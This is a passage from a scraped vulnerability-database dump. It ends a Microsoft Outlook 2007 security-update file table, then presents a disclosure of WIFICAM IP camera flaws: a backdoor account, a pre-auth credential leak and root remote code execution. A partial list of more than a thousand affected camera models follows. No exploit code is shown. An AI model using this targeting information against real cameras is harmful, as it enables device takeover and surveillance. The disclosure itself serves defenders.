applicable</td><td>932</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idr_mreqitem</td><td>Not applicable</td><td>568</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Interconnect_bizcard.xsl</td><td>Not applicable</td><td>15,687</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Issuereportingform.htm</td><td>Not applicable</td><td>13,948</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Lincoln.jpg</td><td>Not applicable</td><td>22,988</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Madewith.gif</td><td>Not applicable</td><td>569</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Mail_zoom1d.bmp</td><td>Not applicable</td><td>358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Mail_zoom1f.bmp</td><td>Not applicable</td><td>358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Mail_zoom1u.bmp</td><td>Not applicable</td><td>358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Monthl.gif</td><td>Not applicable</td><td>67</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Monthr.gif</td><td>Not applicable</td><td>67</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Morebmp.gif</td><td>Not applicable</td><td>854</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Move2.avi</td><td>Not applicable</td><td>18,433</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_busy.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_free.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_html.xsl</td><td>Not applicable</td><td>71,200</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_datepick.gif</td><td>Not applicable</td><td>892</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_datepick_ellipsis.gif</td><td>Not applicable</td><td>949</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_event_separator.gif</td><td>Not applicable</td><td>949</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_outer_thick.gif</td><td>Not applicable</td><td>958</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_outer_thin.gif</td><td>Not applicable</td><td>949</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_oof.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_oowh.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_tent.gif</td><td>Not applicable</td><td>864</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_uparrow.gif</td><td>Not applicable</td><td>65</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Scanpst_bitmap.bmp</td><td>Not applicable</td><td>630</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>Welcome.htm</td><td>Not applicable</td><td>3,892</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr></tbody></table><h2></h2><h3>How to get help and support for this security update</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr> <td faq-panel-body=\"\"> Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/> Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/> Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></td></tr></tbody></table></body></html>", "edition": 4, "modified": "2020-04-16T08:56:34", "id": "KB4011200", "href": "https://support.microsoft.com/en-us/help/4011200/", "published": "2018-02-13T00:00:00", "title": "Description of the security update for Outlook 2007: February 13, 2018", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:14", "description": "## Product Description\r\n\r\nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which allows to stream remotely.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Wireless IP Camera (P2) WIFICAM is a camera overall badly designed with a lot of vulnerabilities. This camera is very similar to a lot of other Chinese cameras.\r\n\r\nIt seems that a generic camera is being sold by a Chinese company in bulk (OEM) and the buyer companies resell them with custom software development and specific branding. Wireless IP Camera (P2) WIFICAM is one of the branded cameras.\r\n\r\nSo, cameras are sold under different names, brands and functions. The HTTP interface is different for each vendor but shares the same vulnerabilities.\r\n\r\nBecause of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), **which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability**.\r\n\r\nThe summary of the vulnerabilities is:\r\n\r\n1. [CVE-2017-8224 - Backdoor account](#backdoor-account)\r\n2. [CVE-2017-8222 - RSA key and certificates](#rsa-lulz)\r\n3. [CVE-2017-8225 - Pre-Auth Info Leak (credentials) within the custom http server](#pre-auth-info-leak-goahead)\r\n4. [Authenticated RCE as root](#root-rce)\r\n5. [Pre-Auth RCE as root](#pre-auth-root-rce)\r\n6. [CVE-2017-8223 - Misc - Streaming without authentication](#open-streaming)\r\n7. [CVE-2017-8221 - Misc - \"Cloud\" (Aka Botnet)](#cloud)\r\n\r\n**The vulnerabilities in the Cloud management affect a lot of P2P or \"Cloud\" cameras.**\r\n\r\n**My tests have shown that the InfoLeak affecting the GoAhead server running on the camera affects at least 1250+ camera models. It can be used to execute the RCE as root. Thus, these cameras are likely affected by a pre-auth RCE as root:**\r\n\r\n```\r\n3G+IPCam Other\r\n3SVISION Other\r\n3com CASA\r\n3com Other\r\n3xLogic Other\r\n3xLogic Radio\r\n4UCAM Other\r\n4XEM Other\r\n555 Other\r\n7Links 3677\r\n7Links 3677-675\r\n7Links 3720-675\r\n7Links 3720-919\r\n7Links IP-Cam-in\r\n7Links IP-Wi-Fi\r\n7Links IPC-760HD\r\n7Links IPC-770HD\r\n7Links Incam\r\n7Links Other\r\n7Links PX-3615-675\r\n7Links PX-3671-675\r\n7Links PX-3720-675\r\n7Links PX3309\r\n7Links PX3615\r\n7Links ipc-720\r\n7Links px-3675\r\n7Links px-3719-675\r\n7Links px-3720-675\r\nA4Tech Other\r\nABS Other\r\nADT RC8021W\r\nAGUILERA AQUILERA\r\nAJT AJT-019129-BBCEF\r\nALinking ALC\r\nALinking Other\r\nALinking dax\r\nAMC Other\r\nANRAN ip180\r\nAPKLINK Other\r\nAQUILA AV-IPE03\r\nAQUILA AV-IPE04\r\nAVACOM 5060\r\nAVACOM 5980\r\nAVACOM H5060W\r\nAVACOM NEW\r\nAVACOM Other\r\nAVACOM h5060w\r\nAVACOM h5080w\r\nAcromedia IN-010\r\nAcromedia Other\r\nAdvance Other\r\nAdvanced+home lc-1140\r\nAeoss J6358\r\nAetos 400w\r\nAgasio A500W\r\nAgasio A502W\r\nAgasio A512\r\nAgasio A533W\r\nAgasio A602W\r\nAgasio A603W\r\nAgasio Other\r\nAirLink Other\r\nAirmobi HSC321\r\nAirsight Other\r\nAirsight X10\r\nAirsight X34A\r\nAirsight X36A\r\nAirsight XC39A\r\nAirsight XX34A\r\nAirsight XX36A\r\nAirsight XX40A\r\nAirsight XX60A\r\nAirsight x10\r\nAirsight x10Airsight\r\nAirsight xc36a\r\nAirsight xc49a\r\nAirsight xx39A\r\nAirsight xx40a\r\nAirsight xx49a\r\nAirsight xx51A\r\nAirsight xx51a\r\nAirsight xx52a\r\nAirsight xx59a\r\nAirsight xx60a\r\nAkai AK7400\r\nAkai SP-T03WP\r\nAlecto 150\r\nAlecto Atheros\r\nAlecto DVC-125IP\r\nAlecto DVC-150-IP\r\nAlecto DVC-1601\r\nAlecto DVC-215IP\r\nAlecto DVC-255-IP\r\nAlecto dv150\r\nAlecto dvc-150ip\r\nAlfa 0002HD\r\nAlfa Other\r\nAllnet 2213\r\nAllnet ALL2212\r\nAllnet ALL2213\r\nAmovision Other\r\nAndroid+IP+cam IPwebcam\r\nAnjiel ip-sd-sh13d\r\nApexis AH9063CW\r\nApexis APM-H803-WS\r\nApexis APM-H804-WS\r\nApexis APM-J011\r\nApexis APM-J011-Richard\r\nApexis APM-J011-WS\r\nApexis APM-J012\r\nApexis APM-J012-WS\r\nApexis APM-J0233\r\nApexis APM-J8015-WS\r\nApexis GENERIC\r\nApexis H\r\nApexis HD\r\nApexis J\r\nApexis Other\r\nApexis PIPCAM8\r\nApexis Pyle\r\nApexis XF-IP49\r\nApexis apexis\r\nApexis apm-\r\nApexis dealextreme\r\nAquila+Vizion Other\r\nArea51 Other\r\nArmorView Other\r\nAsagio A622W\r\nAsagio Other\r\nAsgari 720U\r\nAsgari Other\r\nAsgari PTG2\r\nAsgari UIR-G2\r\nAtheros ar9285\r\nAvantGarde SUMPPLE\r\nAxis 1054\r\nAxis 241S\r\nB-Qtech Other\r\nB-Series B-1\r\nBRAUN HD-560\r\nBRAUN HD505\r\nBeaulieu Other\r\nBionics Other\r\nBionics ROBOCAM\r\nBionics Robocam\r\nBionics T6892WP\r\nBionics t6892wp\r\nBlack+Label B2601\r\nBravolink Other\r\nBreno Other\r\nCDR+king APM-J011-WS\r\nCDR+king Other\r\nCDR+king SEC-015-C\r\nCDR+king SEC-016-NE\r\nCDR+king SEC-028-NE\r\nCDR+king SEC-029-NE\r\nCDR+king SEC-039-NE\r\nCDR+king sec-016-ne\r\nCDXX Other\r\nCDXXcamera Any\r\nCP+PLUS CP-EPK-HC10L1\r\nCPTCAM Other\r\nCamscam JWEV-372869-BCBAB\r\nCasa Other\r\nCengiz Other\r\nChinavasion Gunnie\r\nChinavasion H30\r\nChinavasion IP611W\r\nChinavasion Other\r\nChinavasion ip609aw\r\nChinavasion ip611w\r\nCloud MV1\r\nCloud Other\r\nCnM IP103\r\nCnM Other\r\nCnM sec-ip-cam\r\nCompro NC150/420/500\r\nComtac CS2\r\nComtac CS9267\r\nConceptronic CIPCAM720PTIWL\r\nConceptronic cipcamptiwl\r\nCybernova Other\r\nCybernova WIP604\r\nCybernova WIP604MW\r\nD-Link DCS-910\r\nD-Link DCS-930L\r\nD-Link L-series\r\nD-Link Other\r\nDB+Power 003arfu\r\nDB+Power DBPOWER\r\nDB+Power ERIK\r\nDB+Power HC-WV06\r\nDB+Power HD011P\r\nDB+Power HD012P\r\nDB+Power HD015P\r\nDB+Power L-615W\r\nDB+Power LA040\r\nDB+Power Other\r\nDB+Power Other2\r\nDB+Power VA-033K\r\nDB+Power VA0038K\r\nDB+Power VA003K+\r\nDB+Power VA0044_M\r\nDB+Power VA033K\r\nDB+Power VA033K+\r\nDB+Power VA035K\r\nDB+Power VA036K\r\nDB+Power VA038\r\nDB+Power VA038k\r\nDB+Power VA039K\r\nDB+Power VA039K-Test\r\nDB+Power VA040\r\nDB+Power VA390k\r\nDB+Power b\r\nDB+Power b-series\r\nDB+Power extcams\r\nDB+Power eye\r\nDB+Power kiskFirstCam\r\nDB+Power va033k\r\nDB+Power va039k\r\nDB+Power wifi\r\nDBB IP607W\r\nDEVICECLIENTQ CNB\r\nDKSEG Other\r\nDNT CamDoo\r\nDVR DVR\r\nDVS-IP-CAM Other\r\nDVS-IP-CAM Outdoor/IR\r\nDagro DAGRO-003368-JLWYX\r\nDagro Other\r\nDericam H216W\r\nDericam H502W\r\nDericam M01W\r\nDericam M2/6/8\r\nDericam M502W\r\nDericam M601W\r\nDericam M801W\r\nDericam Other\r\nDigix Other\r\nDigoo BB-M2\r\nDigoo MM==BB-M2\r\nDigoo bb-m2\r\nDinon 8673\r\nDinon 8675\r\nDinon SEGEV-105\r\nDinon segev-103\r\nDome Other\r\nDrilling+machines Other\r\nE-Lock 1000\r\nENSIDIO IP102W\r\nEOpen Open730\r\nEST ES-IP602IW\r\nEST IP743W\r\nEST Other\r\nEZCam EPK-EP10L1\r\nEZCam EZCam\r\nEZCam Other\r\nEZCam PAN/TILT\r\nEZCam Pan/Tilt\r\nEasyCam EC-101HD\r\nEasyCam EC-101HDSD\r\nEasyCam EC-101SD\r\nEasyCam EC-102\r\nEasyCam Other\r\nEasyN 187\r\nEasyN 1BF\r\nEasyN 720P\r\nEasyN F\r\nEasyN F-136\r\nEasyN F-M136\r\nEasyN F-M166\r\nEasyN F-M181\r\nEasyN F-M1b1\r\nEasyN F-SERIES\r\nEasyN F133\r\nEasyN F2-611B\r\nEasyN F3\r\nEasyN F3-166\r\nEasyN F3-176M\r\nEasyN F3-M166\r\nEasyN F3-SERIES\r\nEasyN F3-Series\r\nEasyN F3-m187\r\nEasyN F3M187\r\nEasyN FS-613A-M136\r\nEasyN FS-613B\r\nEasyN FS-613B-M166\r\nEasyN FS-613B-MJPEG\r\nEasyN FS613\r\nEasyN F_M10R\r\nEasyN H3-V10R\r\nEasyN H6-M137h\r\nEasyN M091\r\nEasyN Other\r\nEasyN est-007660-611b\r\nEasyN est-007660333\r\nEasyN f\r\nEasyN f-Series\r\nEasyN f138\r\nEasyN f_series\r\nEasyN fseries\r\nEasyN kitch\r\nEasyN s\r\nEasySE F/B/N/I\r\nEasySE H3\r\nEasySE H3e\r\nEasySE Other\r\nEbode IPV38W\r\nEbode IPV58\r\nEbode Other\r\nEgo Other\r\nElro 901\r\nElro 903\r\nElro 903IP\r\nElro C7031P\r\nElro C703IP2\r\nElro C704-IP\r\nElro C704IP\r\nElro C704IP.2\r\nElro C704ip\r\nElro C803IP\r\nElro C903IP\r\nElro C903IP.2\r\nElro C904IP\r\nElro C904IP.2\r\nElro IP901\r\nElro Other\r\nEminent 6564\r\nEminent EM6220\r\nEminent EM6564\r\nEminent em6220\r\nEsky C5900\r\nEsky L\r\nEsky Live\r\nEsky c5900\r\nEura-Tech IC-03C3\r\nEyeCam ICAM-608\r\nEyeCam IP65IW\r\nEyeCam Other\r\nEyeCam STORAGEOPTIONS\r\nEyeIPCam IP901W\r\nEyeSight ES-IP607W\r\nEyeSight ES-IP811W\r\nEyeSight ES-IP909IW\r\nEyeSight ES-IP935FW\r\nEyeSight ES-IP935IW\r\nEyeSight IP910IW\r\nEyeSight IP915IW\r\nEyeSight Other\r\nEyeSight ip609IW\r\nEyeSight ip909iw\r\nEyeSight ip915iw\r\nEyeSight mjpeg\r\nEyeSpy247 Other\r\nF-Series FSERIES\r\nF-Series Ip\r\nF-Series Other\r\nF-Series ip\r\nFirst+Concept Other\r\nFocuscam F19821W\r\nFoscam FI18904w\r\nFoscam FI18905E\r\nFoscam FI18905W\r\nFoscam FI18906w\r\nFoscam FI1890W\r\nFoscam FI18910E\r\nFoscam FI18910W\r\nFoscam FI18910w\r\nFoscam FI18916W\r\nFoscam FI18918W\r\nFoscam FI18919W\r\nFoscam FI19810W\r\nFoscam FI8094W\r\nFoscam FI81904W\r\nFoscam FI8601W\r\nFoscam FI8602W\r\nFoscam FI8606W\r\nFoscam FI8610w\r\nFoscam FI8903W\r\nFoscam FI8903W_Elita\r\nFoscam FI8904\r\nFoscam FI8904W\r\nFoscam FI8905E\r\nFoscam FI8905W\r\nFoscam FI8905w\r\nFoscam FI8906w\r\nFoscam FI8907W\r\nFoscam FI8908W\r\nFoscam FI8909W\r\nFoscam FI890W\r\nFoscam FI8910\r\nFoscam FI8910E\r\nFoscam FI8910W\r\nFoscam FI8910W_DW\r\nFoscam FI8910w\r\nFoscam FI8916W\r\nFoscam FI8918\r\nFoscam FI89180w\r\nFoscam FI8918E\r\nFoscam FI8918W\r\nFoscam FI8918w\r\nFoscam FI8919W\r\nFoscam FI9804W\r\nFoscam FI9805E\r\nFoscam FI9810\r\nFoscam FI9810W\r\nFoscam FI9818\r\nFoscam FI9820w\r\nFoscam FI9821W\r\nFoscam FI9821w\r\nFoscam FL8910\r\nFoscam FS18908W\r\nFoscam FS8910\r\nFoscam Fi8910\r\nFoscam Other\r\nFoscam fI8989w\r\nFoscam fi1890w\r\nFoscam fl8910w\r\nFoxCam PTZ2084-L\r\nGIGA gb\r\nGT+ROAD HS-006344-SPSLM\r\nGeneral Other\r\nGeneric All-in-one\r\nGeneric Billy\r\nGeneric DomeA-Outdoor\r\nGeneric IP\r\nGeneric Other\r\nGi-star+srl IP6031W\r\nGigaeye GB\r\nGoAhead EC-101SD\r\nGoAhead GoAheadWebs\r\nGoAhead IPCAM1\r\nGoAhead IPCAM2\r\nGoAhead Other\r\nGoAhead thedon\r\nGoCam Other\r\nGoclever EYE\r\nGoclever EYE2\r\nGotake GTK-TH01B\r\nH+264+network+DVR 720p\r\nH+264+network+DVR Other\r\nH.264 Other\r\nH6837WI Other\r\nHD+IPC Other\r\nHD+IPC SV3C\r\nHDIPCAM Other\r\nHeden CAMH04IPWE\r\nHeden CAMHED02IPW\r\nHeden CAMHED04IP\r\nHeden CAMHED04IPWN\r\nHeden CAMHEDIPWP\r\nHeden Other\r\nHeden VisionCam\r\nHeden visionCam\r\nHiSilicon Other\r\nHikvision DS-2CD2132\r\nHistream RTSP\r\nHooToo F-SERIES\r\nHooToo HOOTOO\r\nHooToo HT-IP006\r\nHooToo HT-IP006N\r\nHooToo HT-IP009HDP\r\nHooToo HT-IP206\r\nHooToo HT-IP207F\r\nHooToo HT-IP210HDP\r\nHooToo HT-IP210P\r\nHooToo HT-IP212\r\nHooToo IP009HDP\r\nHooToo Other\r\nHooToo apm-h803-mpc\r\nHsmartlink Other\r\nHungtek WIFI\r\nICAMView Other\r\nICam I908W\r\nICam IP-1\r\nICam Other\r\nICam Other2\r\nICam dome\r\nINISOFT-CAM Stan\r\nINSTAR 4010\r\nINVID Other\r\nIO+Data Other\r\nIP66 Other\r\nIPC IPC02\r\nIPC Other\r\nIPC S5030-TF\r\nIPC S5030-m\r\nIPC SRICAM\r\nIPCC 3XPTZ\r\nIPCC 7210W\r\nIPCC IPCC-7210W\r\nIPCC x01\r\nIPTeles Other\r\nIPUX ip-100\r\nISIT Other\r\nIZOtech Other\r\nIZTOUCH 0009\r\nIZTOUCH A001\r\nIZTOUCH IZ-009\r\nIZTOUCH LTH-A8645-c15\r\nIZTOUCH Other\r\nIZTOUCH Other1\r\nIZTOUCH ap001\r\nIeGeek Other\r\nIeGeek ukn\r\nInkovideo V-104\r\nIprobot3 Other\r\nJRECam JM3866W\r\nJWcam JWEV\r\nJWcam Other\r\nJaycar 3834\r\nJaycar 720P\r\nJaycar Other\r\nJaycar QC-3831\r\nJaycar QC-3832\r\nJaycar QC-3834\r\nJaycar QC-3836\r\nJaycar QC-3839\r\nJaytech IP6021W\r\nJhempCAM Back\r\nJhempCAM Other\r\nKaiKong 1601\r\nKaiKong 1602w\r\nKaiKong Other\r\nKaiKong SIP\r\nKaiKong SIP1602\r\nKaiKong SIP1602W\r\nKaiKong sip\r\nKaiKong sip1602w\r\nKenton gjc02\r\nKinson C720PWIP\r\nKlok Other\r\nKnewmart KW01B\r\nKnewmart KW02B\r\nKogan KAIPC01BLKA\r\nKogan KAIPCO1BLKA\r\nKogan Other\r\nKogan encoder\r\nKogan kaipc01blkb\r\nKompernass IUK\r\nKoolertron Other\r\nKoolertron PnP\r\nKoolertron SP-SHEX21-SL\r\nLC+security Other\r\nLW lw-h264tf\r\nLYD H1385H\r\nLager Other\r\nLeadtek C351\r\nLevelOne 1010/2010\r\nLibor Other\r\nLifeTech MyLifeTech\r\nLifeTech Other\r\nLifeTech dd\r\nLilly Other\r\nLinq Other\r\nLloyds 1107\r\nLoftek CXS\r\nLoftek Nexus\r\nLoftek Other\r\nLoftek SPECTOR\r\nLoftek Sendinel\r\nLoftek Sentinel\r\nLogiLink WC0030A\r\nLogiLink wc0044\r\nLogitech C920\r\nMCL 610\r\nMJPEG Other\r\nMaginon 100\r\nMaginon 10AC\r\nMaginon 20C\r\nMaginon IP-20c\r\nMaginon IPC\r\nMaginon IPC-1\r\nMaginon IPC-10\r\nMaginon IPC-100\r\nMaginon IPC-100AC\r\nMaginon IPC-10AC\r\nMaginon IPC-2\r\nMaginon IPC-20\r\nMaginon IPC20C\r\nMaginon IPC_1A\r\nMaginon Other\r\nMaginon SUPRA\r\nMaginon Supra\r\nMaginon ipc\r\nMaginon ipc-1a\r\nMaginon ipc100a\r\nMaginon ipx\r\nMaginon w2\r\nMarmitek GM-8126\r\nMaygion IP\r\nMaygion OTHER2\r\nMaygion Other\r\nMaygion V3\r\nMaygion black\r\nMediatech mt4050\r\nMedisana SmartBabyMonitor\r\nMerlin IP\r\nMerlin Other\r\nMerlin vstc\r\nMessoa Other\r\nMingyoushi S6203Y-WR\r\nMomentum 2002\r\nMomentum MO-CAM\r\nNEXCOM S-CAM\r\nNIP NIP-004500-KMTLU\r\nNIP NIP-075007-UPHTF\r\nNIP NIP-11BGPW\r\nNIP NIP-14\r\nNTSE Other\r\nNeewer Other\r\nNeewer V-100\r\nNeo+CoolCam NIP\r\nNeo+CoolCam NIP-02(OAM)\r\nNeo+CoolCam NIP-06\r\nNeo+CoolCam NIP-066777-BWESL\r\nNeo+CoolCam NIP-102428-DFBEF\r\nNeo+CoolCam NIP-H20(OZX)\r\nNeo+CoolCam OBJ-007260-LYLDU\r\nNeo+CoolCam Other\r\nNeo+CoolCam neo\r\nNeo+CoolCam nip-11\r\nNeo+CoolCam nip-20\r\nNess Other\r\nNetView Other\r\nNetcam Dual-HD\r\nNetcam HSL-232245-CWXES\r\nNetcam OUVIS\r\nNetcam Other\r\nNetware Other\r\nNexxt+Solution Xpy\r\nNixzen Other\r\nNorthQ NQ-9006\r\nOffice+One CM-I11123BK\r\nOffice+One IP-900\r\nOffice+One IP-99\r\nOffice+One Other\r\nOffice+One SC-10IP\r\nOffice+One ip-900\r\nOffice+One ip900\r\nOpexia OPCS\r\nOptica+Video FI-8903W\r\nOptica+Video FI-8918W\r\nOptica+Video Other\r\nOtto 4eye\r\nOvermax CamSpot\r\nOvermax Camspot\r\nOwlCam CP-6M201W\r\nP2p wificam\r\nPCS Other\r\nPanasonic BL-C131A\r\nPeopleFu IPC-674\r\nPeopleFu IPCAM1\r\nPeopleFu IPCAM2\r\nPeopleFu IPCAM3\r\nPeopleFu IPCAM5\r\nPixpo 1Z074A2A0301627785\r\nPixpo PIX006428BFYZY\r\nPixpo PIX009491MLJYM\r\nPixpo PIX009495HURFE\r\nPixpo PIX010584DFACE\r\nPlaisio IP\r\nPlanex Other\r\nPlanex PLANEX\r\nPolariod P351S\r\nPolaroid IP-100\r\nPolaroid IP-101W\r\nPolaroid IP-200B\r\nPolaroid IP-201B\r\nPolaroid IP-350\r\nPolaroid IP-351S\r\nPolaroid IP-360S\r\nPolaroid IP-810W\r\nPolaroid IP-810WZ\r\nPolaroid Other\r\nPolaroid POLIP101W\r\nPolaroid POLIP201B\r\nPolaroid POLIP201W\r\nPolaroid POLIP351S\r\nPolaroid POLIP35i5\r\nPowerLead Caue\r\nPowerLead PC012\r\nProveCam IP2521\r\nProvision 717\r\nProvision F-717\r\nProvision F-737\r\nProvision PT-737\r\nProvision WP-711\r\nProvision WP-717P\r\nPyle HD\r\nPyle HD22\r\nPyle HD46\r\nPyle Mine\r\nPyle PIPCAM15\r\nPyle Pipcam12\r\nPyle cam5\r\nPyle pipcam25\r\nPyle pipcam5\r\nQ-nest QN-100S\r\nQ-nest qn-100s\r\nQueback 720p\r\nROCAM NC-400\r\nROCAM NC-500\r\nROCAM NC300\r\nROCAM NC300-1\r\nROHS IP\r\nROHS none\r\nRTX 06R\r\nRTX DVS\r\nRTX IP-06R\r\nRTX IP-26H\r\nRTX Other\r\nRollei safetycam-10hd\r\nSES Other\r\nSKJM Other\r\nSST SST-CNS-BUI18\r\nSVB+International SIP-018262-RYERR\r\nSafeHome 278042\r\nSafeHome 616-W\r\nSafeHome IP601W-hd\r\nSafeHome Other\r\nSafeHome VGA\r\nSafeHome iprobot\r\nSamsung Other\r\nSantec-Video Other\r\nSarotech IPCAM-1000\r\nSarotech ip300\r\nScricam 004\r\nScricam 192.168.1.7\r\nScricam AP-004\r\nScricam AP-009\r\nScricam AP0006\r\nScricam AP006\r\nSecam+CCTV IPCAM\r\nSecam+CCTV Other\r\nSeculink 10709\r\nSeculink Other\r\nSecur+Eye xxc5330\r\nSeisa JK-H616WS\r\nSenao PTZ-01H\r\nSequrecam Other\r\nSequrecam PNP-125\r\nSercomm Other\r\nShenwhen+Neo+Electronic+Co NC-541\r\nShenwhen+Neo+Electronic+Co Other\r\nShenwhen+Neo+Electronic+Co X-5000B\r\nShenzhen 720P\r\nShixin+China IP-129HW\r\nSiepem IPC\r\nSiepem S5001Y-BW\r\nSiepem S6203y\r\nSiepem S6211Y-WR\r\nSimi+IP+Camera+Viewer Other\r\nSineoji Other\r\nSineoji PT-315V\r\nSineoji PT-3215P\r\nSineoji PT-325IP\r\nSinocam Other\r\nSky+Genious Genious\r\nSkytronic IP\r\nSkytronic IP99\r\nSkytronic Other\r\nSkytronic WiFi\r\nSkytronic dome\r\nSmartEye Other\r\nSmartWares C723IP\r\nSmartWares c724ip\r\nSmartWares c923ip\r\nSmartWares c924ip\r\nSolwise SEC-1002W-IR\r\nSpy+Cameras WF-100PCX\r\nSpy+Cameras WF-110V\r\nSricam 0001\r\nSricam 004\r\nSricam A0009\r\nSricam A001\r\nSricam AP-001\r\nSricam AP-003\r\nSricam AP-004\r\nSricam AP-005\r\nSricam AP-006\r\nSricam AP-009\r\nSricam AP-012\r\nSricam AP-CAM\r\nSricam AP0009\r\nSricam AP002\r\nSricam AP995\r\nSricam Cam1\r\nSricam Front\r\nSricam Home\r\nSricam Other\r\nSricam SP005\r\nSricam SP012\r\nSricam SP013\r\nSricam SP015\r\nSricam SRICAM\r\nSricam SRICAM1\r\nSricam aj-c2wa-c118\r\nSricam ap\r\nSricam ap006\r\nSricam ap1\r\nSricam h.264\r\nSricam sp013\r\nSricctv A-0006\r\nSricctv A-009\r\nSricctv AJ-006\r\nSricctv AP-0001\r\nSricctv AP-0005\r\nSricctv AP-0009\r\nSricctv AP-001\r\nSricctv AP-002\r\nSricctv AP-003\r\nSricctv AP-004\r\nSricctv AP-004AF\r\nSricctv AP-005\r\nSricctv AP-006\r\nSricctv AP-007\r\nSricctv AP-008\r\nSricctv AP-009\r\nSricctv AP-011\r\nSricctv AP-014\r\nSricctv H-264\r\nSricctv Other\r\nSricctv P2P-BLACK\r\nSricctv P2P-Black\r\nSricctv SP-007\r\nSricctv SR-001\r\nSricctv SR-004\r\nStar+Vedia 6836\r\nStar+Vedia 7837-WIP\r\nStar+Vedia C-7835WIP\r\nStar+Vedia Other\r\nStar+Vedia T-6836WTP\r\nStar+Vedia T-7833WIP\r\nStar+Vedia T-7837WIP\r\nStar+Vedia T-7838WIP\r\nStarCam C33-X4\r\nStarCam EY4\r\nStarCam F6836W\r\nStarCam Other\r\nStarCam c7837wip\r\nStipelectronics Other\r\nStorage+Options HOMEGUARD\r\nStorage+Options Other\r\nStorage+Options SON-IPC1\r\nSumpple 610\r\nSumpple 610S\r\nSumpple 631\r\nSumpple 960P\r\nSumpple S601\r\nSumpple S610\r\nSumpple S631\r\nSumpple S651\r\nSumpple qd300\r\nSumpple s631\r\nSunVision+US Other\r\nSunbio Other\r\nSuneyes Other\r\nSuneyes SP-T01EWP\r\nSuneyes SP-T01WP\r\nSuneyes SP-TM01EWP\r\nSuneyes SP-TM01WP\r\nSuneyes SP-tm05wp\r\nSunluxy H-264\r\nSunluxy HZCam\r\nSunluxy Other\r\nSunluxy PTZ\r\nSunluxy SL-701\r\nSupra+Space IPC\r\nSupra+Space IPC-1\r\nSupra+Space IPC-100AC\r\nSupra+Space IPC-10AC\r\nSupra+Space Other11\r\nSupra+Space ipc-20c\r\nSure-Eye Other\r\nSurecom LN-400\r\nSwann 005FTCD\r\nSwann 440\r\nSwann 440-IPC\r\nSwann ADS-440\r\nSwann ADS-440-PTZ\r\nSwann ADS-CAMAX1\r\nSwann Other\r\nSwann SWADS-440-IPC\r\nSwann SWADS-440IPC-AU\r\nSygonix 43176A\r\nSygonix 43558A\r\nSzneo CAM0X\r\nSzneo CoolCam\r\nSzneo NIP\r\nSzneo NIP-0\r\nSzneo NIP-02\r\nSzneo NIP-031\r\nSzneo NIP-031H\r\nSzneo NIP-06\r\nSzneo NIP-12\r\nSzneo NIP-2\r\nSzneo NIP-20\r\nSzneo NIP-210485-ABABC\r\nSzneo NIP-26\r\nSzneo NIP-X\r\nSzneo NP-254095\r\nSzneo Other\r\nSzneo TFD\r\nTAS-Tech Other\r\nTechnaxx tx-23\r\nTechview GM8126\r\nTechview QC-3638\r\nTechview qc3839\r\nTemvis Other\r\nTenda C50S\r\nTenda c30\r\nTenda c5+\r\nTenvis 0012\r\nTenvis 3815\r\nTenvis 